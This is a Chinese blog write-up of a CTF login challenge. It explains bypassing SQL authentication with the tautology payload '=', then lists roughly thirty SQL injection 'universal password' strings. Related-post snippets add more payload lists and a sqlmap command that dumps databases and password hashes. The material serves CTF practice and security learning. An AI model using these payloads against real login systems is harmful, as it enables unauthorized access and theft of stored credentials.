实验吧-WEB-sql万能密码注入

最新推荐文章于 2024-08-17 18:50:32 发布
原创 最新推荐文章于 2024-08-17 18:50:32 发布 · 708 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客围绕CTF题目登陆解题展开,指出登陆成功可能获flag,关键字被过滤。介绍将where条件转换为永真式的解题思路,构造特定的username和password实现登陆。还列举了php常见的万能密码,如admin’/* 密码*/’等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

登陆一下好吗??

题目链接http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
解题思路
登陆一下好吗?表明可能登陆成功后就能得到flag,但是题目已经说过滤了的一切,所以一些关键字 例如 or ,应该被过滤了。
通常的后台代码应该是:
select username,password from user where username=’$user’ and password =’ $pwd’
需要将where的条件转换为永真式,就能查询到所有的用户和密码,
因此构造
username ‘=’
password ‘=’
即where username=’’=’’ and password=’’=’’
等号左右都是空 ,构成了永真式,因此语句能够运行,登陆以后就会看到flag
ps:payload的username和password都是 任意字母’=‘任意字母 例如 t’=‘p 此时where 语句从左向右依次读取,username=‘t’ 返回 false=‘p’ ‘p’进行类型转换是 0 即 false=0 结果是true,同理可得true and true 成为永真式。
在这里插入图片描述
php常见的万能密码:
admin’/*
密码*/’
‘or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or”="a’=‘a
“or1=1–
“or=or”
'‘or’=‘or’
‘) or (‘a’=‘a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a’=‘a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’='a
‘or1=1–
1’or’1’=‘1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1–

CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 4161
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTF—WebSQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user==’,pass==’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中提示,提交方法为POST,所以此题为sqlmap的post注入,采用kai
pikachu之SQL注入漏洞:从“万能密码”到“删库跑路”
最新发布
m0_58442919的博客
02-21 1149
SQL注入Web安全的“元老级”漏洞,从“万能密码”到“删库跑路”,攻击手段层出不穷。通过今天的实验,我们不仅掌握了数字型、字符型、搜索型注入的攻防技巧,还解锁了参数化查询这面“终极护盾”。“用户输入不可信,参数查询是根本,权限收紧勤过滤,从此注入是路人!
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
WebSQL注入--万能密码
HAPPY
08-08 9898
后台万能密码¶ admin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1-- username=' or ''='&password=' or ''=' 解析:select * from admin where username=''=''...
sql万能注入语句
chidi2647的博客
01-23 1096
1.针对有单引号的情况 : 万能密码 : select * from users where username='xxxx' and password='xxxxxx' or 1='1'; 万能用户名 : select * from users where username='xxxx' un...
SQL万能密码
qq_43776408的博客
06-13 2184
SQL万能密码:’ or 1=1 select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’ 输入用户名:’ or 1=1 SQL变成下面这个样子: select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’ 1=‘1’ 永远为真,所以就验证通过了。。。 ...
-------已搬运------SQL注入的 过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 2082
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
WEB渗透Web突破篇-SQL注入SQLMAP)
qq_59468567的博客
07-31 1623
sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -p 指定注入点,注入参数 --user-agent 指定user-agent --random-agent 随机user-agent
sql注入万能语句
2301_80143258的博客
08-17 645
当我们输入正确的用户名与密码就可以登陆进去,但是这个验证机制也可以通过SQL语句来构造特殊的字符串来通过验证。name就是输入的用户名,pwd 就是输入的密码(“$”表示变量,存储)”where“表示条件,为真则执行,验证成功,为假则不执行,验证失败。"or"是或的意思,根据离散数学的逻辑判断规则,可知一真一假为真,输入用户名:“username"输入密码:”password"再例如:1’or 1=1 #查询出表中所有的字段。
SQL-万能密码
qq_70434663的博客
03-14 1627
一般的,库验证登录注册查询数据会用到以下的句型,如果用户名与密码匹配正确则返回真值通过验证成功登录。(第一个“1”可以随意修改),随便输入password,那么传入后端验证时SQL语句为。如果不匹配数据库也能返回真值那么就能绕过验证登录。打开目标站点,随便输入用户名密码,查看返回结果,提示错误。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证。知识点:这题需要用到万能密码。首先了解一下万能密码
后台登陆万能密码
请叫我菜鸟
01-14 1万+
asp aspx万能密码   1: "or "a"="a    2: ')or('a'='a    3:or 1=1--    4:'or 1=1--    5:a'or' 1=1--    6: "or 1=1--    7:'or'a'='a    8: "or"="a'='a    9:'or''='    10:'or'='or'    11: 1 or '1'=
mysql 报错注入语句_MySQL注入(三)之报错
weixin_29957793的博客
02-01 281
MySQL注入(三)之报错SQL注入0x00 注入报错常见sql报错注入的函数及sql注入语句1、通过floor报错,注入语句如下:and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、通过ExtractValue报错...
SQL注入(万能密码)
qq_69432323的博客
03-14 6858
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
[sql注入]万能密码
qq_37301470的博客
11-13 400
uname=1&passwd=1 or 1=1--+ uname=1&passwd=1' or 1=1--+ uname=1&passwd=1" or 1=1--+ uname=1&passwd=1') or 1=1--+ uname=1&passwd=1") or 1=1--+ 作者:Hyafinthus 链接:https://www.jianshu.com/p/b9ceed993ad4 来源:简书 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出
万能密码sql注入
hk_hkl的博客
07-17 9874
万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码。,所以这需要使用 a’ or 1 – a 而不是 a’ or 1 --a 其原理和 a’ or 1 # 大同小异。
SQL注入万能密码
热门推荐
qq_46172668的博客
07-09 2万+
SQL注入万能密码 SQL注入万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台 http://www. .com/admin/admin_login.asp 账号:djlfjdslajdfj(随意输入) 密码:1‘or’1’=‘1 1. 用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。用户登录时,后台执行的数据库查询操作(SQL语句)是:【Selectuser_id,user_type,email From users Where us
SQL注入
主要为C++知识点、Linux知识点,计算机组成结构笔记。
04-19 3739
实际上这个过程是,admin'# 作为用户名登录后,数据库对该用户名,密码信任,实际上这个用户名被代码替换后,登录的不是admin'# ,而是admin。修改的是admin的密码,这就是二阶注入的原理。所谓的二阶注入,利用的是,数据库系统对已有信息的“信任”,将注入的用户名输入到系统后,利用这种信任,登录到数据库其他用户,比如admin'#成功注册后,但是登录的却是admin。此时,username为8 ,根据or的运算,3=3是永真式,#将后半句注释了,故这句代码执行结果永远为真,可以登录成功。
SQL注入万能密码
qq_53809201的博客
06-14 1324
【代码】SQL注入万能密码
揭秘SQL注入万能密码:常见技巧与防范
在提供的标题“sql注入万能密码”中,所谓的“万能密码”实际上是指一系列常用于测试或尝试破解数据库的SQL注入字符串,这些字符串利用了SQL语法的某些特性来达到目的。 1. **基础原理**: SQL注入是通过在用户输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值